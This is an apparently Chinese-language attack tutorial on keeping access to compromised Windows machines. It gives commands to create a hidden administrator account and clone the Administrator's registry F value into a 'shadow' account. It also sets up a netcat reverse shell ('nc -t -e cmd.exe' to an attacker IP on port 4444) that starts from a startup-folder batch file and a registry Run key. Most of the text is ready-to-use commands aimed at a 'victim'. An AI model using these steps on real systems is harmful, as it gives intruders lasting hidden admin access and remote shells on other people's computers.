Windows提权之权限维持

影子账号创建

创建普通账号

net user laosec 123admiN@ /add #创建普通账号laosec密码为123admiN@

net localgroup administrators laosec /add #将普通账号laosec添加进administrators组

创建隐藏账号

net user laosec$ 123admiN@ /add #创建隐藏账号laosec$密码为123admiN@(计算机管理可见)

net localgroup administrators laosec$ /add #将隐藏账号laosec$添加到administrators组中

创建影子账号

步骤一：打开注册表

WIN+R–>regedit #注册表编辑器命令

HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/

#遇到没有权限问题对HKEY_LOCAL_MACHINE/SAM/SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限

步骤二：修改隐藏账号

在Users目录下有00000XXX开头的文件还有Names

找到Names文件夹下的administrator单击，可以看到右侧的类型，其类型的值便对应着上面00000XXX

选中与administrator所对应的00000XXX在右侧双击F键值，在弹出窗口中将值内容全部复制

#此值要给予要创建的影子账号的F键值中

在Names中找到要修改账户的类型值，找到其对应的00000XXX，并将刚才复制的内容覆盖掉其影子账户的F中的值

导出Names下的影子账户为1.reg

导出Users下影子账户对应的00000XXX为2.reg

步骤三：删除隐藏账号

net user laosec$ /del #删除隐藏账号laosec$

步骤四：创建隐藏账号

将1.reg导入到注册表中

将2.reg导入到注册表中

步骤五：注销登录验证

NC自动反弹

思路

通过上传NC并配置注册表或开机自启动程序->重启服务器来获取到目标及其的CMD Shell

攻击者与受害者网络能够互通

攻击者VPS必须时刻监听相对应的端口

NC常规测试

nc -lvvp port #攻击者VPS操作 侦听本地port

nc -t -e cmd.exe ip port #受害者操作 正向连接到攻击者的VPS

1. 自启动目录

在受害者主机中进入到开机自启动目录下

C:\Documents and Settings\Administrator\「开始」菜单\程序\启动

创建sys.bat内容为

start /b nc -t -e cmd.exe 192.168.31.132 4444

在攻击者主机开启侦听

重启受害者主机，等待shell反弹

2. 注册表启动

reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “sysone” /t REG_SZ /d “C:sys.bat” /f

参数说明：

/v 所选项之下要添加的值名

/t RegKey 数据类型 如果忽略，则采用 REG_SZ

/d 要分配给添加的注册表 ValueName 的数据

/f 不用提示就强行改写现有注册表项

在攻击者主机开启侦听

重启受害者主机，等待shell反弹

结果验证